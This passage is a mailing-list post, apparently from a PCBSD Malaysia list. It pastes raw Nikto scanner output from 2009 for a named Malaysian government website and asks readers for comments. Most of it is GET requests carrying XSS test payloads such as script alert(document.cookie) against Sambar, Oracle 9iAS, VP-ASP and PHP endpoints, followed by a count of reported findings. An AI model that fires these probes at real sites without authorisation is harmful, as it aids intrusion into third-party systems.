script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/iecreate.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/ieedit.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/info.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/mkdir.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/rename.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/search.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/sendmail.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/template.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/update.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/vccheckin.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/vccreate.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/vchist.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/edit.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/ieedit.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/info.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/rename.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/sendmail.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/update.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/vccheckin.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/vccreate.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/vchist.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5102: GET /syshelp/stmex.stm?<br>
foo=123&amp;bar=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server<br>
default script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5103: GET /syshelp/cscript/showfunc.stm?<br>
func=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5104: GET /syshelp/cscript/showfncs.stm?<br>
pkg=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5105: GET /syshelp/cscript/showfnc.stm?<br>
pkg=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5106: GET /netutils/ipdata.stm?<br>
ipaddr=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5107: GET /netutils/findata.stm?<br>
host=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5107: GET /netutils/findata.stm?<br>
user=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5108: GET /sysuser/docmgr/search.stm?<br>
query=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-701: GET /pls/dadname/htp.print?<br>
cbuf=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Oracle 9iAS is vulnerable<br>
to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-20954: GET /shopadmin.asp?Password=abc&amp;UserName=<br>
\&quot;&gt;&lt;script&gt;alert(foo)&lt;/script&gt; : VP-ASP Shopping Cart 5.50<br>
shopadmin.asp UserName Variable XSS.<br>
+ OSVDB-20406: GET /phpinfo.php?<br>
GLOBALS[test]=&lt;script&gt;alert(document.cookie);&lt;/script&gt; : PHP contains<br>
a flaw that allows a remote cross site scripting attack.<br>
+ OSVDB-24484: GET /phpinfo.php?<br>
cx<br>
[]=<br>
IABfYtCLNw0eFSopw7pztAMoYBk4HrLkyLRuO6sjTJBRVhDP5y1SU5kV25VBcSRVh28H1dOO<br>
UNRzY7ZIjkOGmUnQovnJSahmxGTRVyDr0FoD7RpuIa2eSighiMGwdHQucM8c5xl4cLJdZnw0<br>
B6c12hcXnT2cJji9pBrUNJ2JDjYAMtnBtXsOYW8OYRWphRHYu2W1Po4L3DEZD0QcIsfTSPqY<br>
SQLnQD0oCSJJNzSt3D5AWhcUfjHajiL34Q9lckJjqilRz8fplgSdF6lrgFbpX6VNRsF1hJQ0<br>
f5ABtDwiSn03HX965MEreLIXXmvmt5OOk7rBrRyi7h19gUAIZUdqehPI3Nghi9JSNwpgTdtd<br>
TUOY5GSU9nl1DDP9iJOIhPMKtaOfL3aYDAvzZklAJ5lPWA8l89pCdGz4oOxt3vHS9kW41eux<br>
QYGsyf3xhSBotT22lwS4DugiF0dyWDEiN0e3k0LQWBC2L2040RFSC9b6uJWjzqSjd7BuWez6<br>
4ttWYwsb7ez2PmxtWjrA7Ao2rHoNAeMi4MunrDpwb2FZZWEyZQCzzOhDI0nuI671rkHtiltC<br>
o5cyUDfrWo0X5JRtI4J0XOLxLRs4gJ8XQDAytUDT0RfFiv5aYGb455EXN57Vs4w49LClAEjz<br>
TLMgQQLzrHabfEEYTRNWJK3ZlsV4PvLVds7typSb4yVY8c2Em1eBZvym0YBFi7Gw19el2NrB<br>
x2CNtGDQlaNt2SfFTP9DX9ga2fqwVDMiUbk7wulIygwYmI3mF9vHc83m6BthlyduyGc7MMpI<br>
xfk7vX2Z8Ir0XYNAhdcAh62lTai5FJ0MLcaDsy2eFd5j7zNWbCjP3v8hs5I8D0B4iKwZmwhT<br>
ZeKQjOpCXIGJAvKAPtqDY6yJg2LIwluUkzMV3N0DyzOU2VV2IkiTgYzlTJMLCdMgMcZmosUt<br>
vnRwWq246SSEqmnloNyeaT1P1uWIJq046uOySQ8MukoSlCg7mbZQlj6ivbG5fcjy7BepKPhp<br>
5Isdk7Q62nI1NHDTDBB3uA0pL00Ui1CRg7ZRT8zw6N2J5BxbBAAUxxFln2SAoBGzPTV2tpFe<br>
j00I3o0KgIicobVDfwWBIgbqCu2Rv6G0FYxIExqTC9MrPd7gasMOTz96U5AZlus5tSCYPwId<br>
eSddAACh8FEofVzkcS9nHYPcR9LJXvxgqzXu1s66NNlJZDiCGf83IWCGb1h3cuX1jHEaXujc<br>
346TQLz19tBUHNkb1gYzmrWszrRZatYpmzagn7KjDoHqsYnwTtBCPLnRbOxzW5aPefkMBTA0<br>
tysFi5IWDwPf0IUrOs7WoeIjpoaohvM34tbTAZbHyCLHBmfwaOr2InetfRp5w8agZ88C35f0<br>
9saFFdhX2PfOer1tNNN4al2o0KSnzpicCXf2nBLoeaDetPF2285Jlv64gNYIJ8Cr0cXuzFOy<br>
jVU00QyrQoEtQlG8obeYTICu8S3x53LiaEv49k0O8zfuJ4t5VQjnYsW41WymJh4XidoMEGr7<br>
I7drFRCRtfYSPNLjiO089Kwi6Mf6b9XHfXZXBScBfCCeeZXQVKadjxnHMwreGq9t2QYb5v9X<br>
rRrUyvsO4KqKWGV5fGFhIvfxUwJZTkE9SaXbXHvEaCE3qn0YBjgAsSrCNgDjq7JJrC84os5P<br>
aITCKxPnNapQV3INznFdmHBbV5KxZUfb0FoJ0qNIGuLRDlG6tULYWQ2SBlzpo9AreOsLMAHF<br>
fVfsDSTqQjmVKUuccADCk4CaQHD97JOYpf3zV7mjqutn1Ck2AOkacdsTigTQv2rcOdQJcurY<br>
YENagxK5PVIqXF5NMZVHjumvhihO6nTjuwAsLLUR8Fr8Y2cxuSr9hqBecxATEmg2Evr26ayv<br>
Y22H6qAtqhPRrehFFfzDgYDSW6QSJY356LSiOxTgXDxOakGuwOEEZqwRYgIjsRMRUgi8BKeI<br>
Z2X8y7pu1lkufUaGx3wgZp0ZvzuEggY22D1t0oOTBzzsR16cKfEhA08dgFIQDolnC0dc8zm1<br>
8kN9tFSSYdaBo9k01X0q8HnHMdrXMwyymxITp1gwWHQRgiDEGbkcGsA5VYdgx6uZMEJIS4CP<br>
u0F13RpKCdlkxPV7BmGkbm7YFwenqaxlwYzSp2hNrrpIzvwXOK3PJqaBBTtU7eR7IkBIaDl4<br>
sbjgeXOobiP9q1FBaif7ENUSnZiG1H0BDrbn45hxAvkrfMgG7sfGcRYOTBGc2fXx7Qhc6Kzy<br>
Kuf4p20uD5beqAcVCZf3gGQrnPK8sou1gfkZpxXZcqAY4HD0b4EJiu67V2nd3D4juG1xZCni<br>
pXqgBNH38qpcUopkp7kBw9CE5Aw2K8DUzRdOGlKwirh3wTj1FrLX2gV9emuSz5Fx6LcOAB9T<br>
fdG7YqxuQqF4FUkurMjsKZfcI8VCidq1tJGmUBuXxMfdkn2Fnn5wXFJ1y3LtLJQRNaffCfgc<br>
cfONpofjRY0nQ3IcXAZIONe7tgQunx2wfm4N5Uu89Oyztm2FauK15k31oLlejRWMHDYq3iUQ<br>
lM5kwfL5OAzcGcM465rrNOcPrN0EcfCj0ddzegxngnNTX7DaTY73eUNTRvQQA51aYXDCWpRz<br>
DwxZORtpJtR2wpxtoZHijNlykSCwKYNmSovOkK3kcENmQUw6eiV2RlUsGy62tnxJnpt6OyxY<br>
gRyTa3SHVofk8RN6pzncOmoxHHwK6spgcN95WSeGoQkt46cWn1jHOgM3NqVfuFmecQwGFrcN<br>
xsZpZF7HzpjDxwtlmhU5IVVv8q8dD0FCmpFwpzQ3dSFe5bTSJVWDEIVK5z9xty6MPoDjDDDm<br>
IXMTHXIGPpU52pAm1rNZSLEW29kcW5kXdpEbmZrWJAQZZ3FX6eeOapijdazij36wWJj9lao7<br>
dvFzt83loQw73bKd2GRdSj683IxDmpwiWOeUsVu9Y1i2aUrSLMsP2PlguIrVCeMoH9wOiTMS<br>
rfnuSlcqHWHaYEns8Vpcppem9seqBG2M3778M49aqD0hbxa00lQBNTKcKqiLl0s55vNVzf8W<br>
qi85aWZjUOm2ENsg9J1MtjdYN5yRumpOpo7egMjeVDGiKHH5FsZtPjHYFKyieLZP8Wv7zsI4<br>
ts1mu1SxolEvvb1dioAxqn3cRWdH1LUCcyeLozEIfcFNtIRQywUUvYcpctFAC1HMmnh5lkaT<br>
L1XJN4vughA4eNCMMAJRG34kcFIJCpzmMuyhSEhSfiZ0vGa3iNFdstb9DHeFB5xkM3XKzn8q2SS3Ywnmbz3RyHDD05pskb6Chmvp87F3D9xGSendRdIDKorHcLtjLnvxOleN0DfS8tylx4HRxPxYNxoIJx5rN2nrXBAXGFHhqKKYiuXIxLo5t14ekOvm1QQvQvMa9kTGH7xH2ez9mWRWxLlGkOuxgT7gXwYLtT1NZvx849dj1S7taqpzB4AXQORick0s9OPDyuMOG2ojfqzC6HkZsoj8I55Bj37Ci1mOk5Tj2kHt1fMzm0erQ1CV4BTgGr1bOCOMcVYtKQ9ZT8XRCWQYImeM4lEHe17soKTkk8ziJgksDTOzd7MJxSpVZa3jXf5ykV9ViOb1RMz4E76AODaF5wlSp1GytGoLmsXnj90ILoRxPzjLx3ZSmnaTTWhy84rwcnsof618wqPC6ucd31ITEOEMFDG8bxwjdvYlJLvfuExAintARfREZOgDMSucADj9B0G24dRKVHg4ZMagEjzxtV50msaQNsp5RXxCebHmT04VqBmPVGh0ci8OgRaz8Ha8LysvB5rgU2uzqktctGpeShtQMChihPHozkSuTT62LaOfAPSanAYoagD0Pj5wiZdyLVvMMsB0fKFIf5bAGEv4N2Z3efEfFfoqYSthIAbU1Ma0LmPVEoF76hpajXi2Zqc3wZzRnyq0fNatIyitMEcJBEJWH0zSGhJP6P0JqrqBuwkXfLzZcXC3X2Ggx0n6irr42zjSPRrSpyfhq6mW0MlPTmyCEKjdOsnHM7vDrvMiFNcRJLx8TVjFzAfcluZKDL0oTEGhlbc7y5cyulg4MVgqPdey6wNVuFLKgeJKatoCYrxFymlxHvr60XIWOOwu4il1XYqnm17t3wEhS0k1B4OTv7Oj1Qrg<br>

&lt;script&gt;alert(foo)&lt;/script&gt; : PHP 5.1.2 and 4.4.2 phpinfo() Function<br>
Long Array XSS<br>
+ OSVDB-35935: GET /rpc.php?q=\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/<br>
script&gt; : Unobtrusive Ajax Star Rating Bar is vulnerable to XSS in the<br>
q variable.<br>
+ 3577 items checked: 216 item(s) reported on remote host<br>
+ End Time:        2009-09-05 1:09:01 (444 seconds)<br>
---------------------------------------------------------------------------<br>
+ 1 host(s) tested<br>
<br>
Test Options: -h <a href="http://www.mardi.gov.my" target="_blank">www.mardi.gov.my</a> -output mardi.txt<br>
---------------------------------------------------------------------------<br>
Maybe someone might be share this result and give your comment about<br>
this. Your comment are need and hope we can do something about it.<br>
Thanks<br>
Mohd Fazli Azran<br>
PCBSD Malaysia<br>
<br>
<br>
<br>
_______________________________________________<br>
PCBSD-malaysia mailing list<br>
<a href="mailto:PCBSD-malaysia@lists.pcbsd.org">PCBSD-malaysia@lists.pcbsd.org</a><br>
<a href="http://lists.pcbsd.org/mailman/listinfo/pcbsd-malaysia" target="_blank">http://lists.pcbsd.org/mailman/listinfo/pcbsd-malaysia</a><br>
</blockquote></div><br>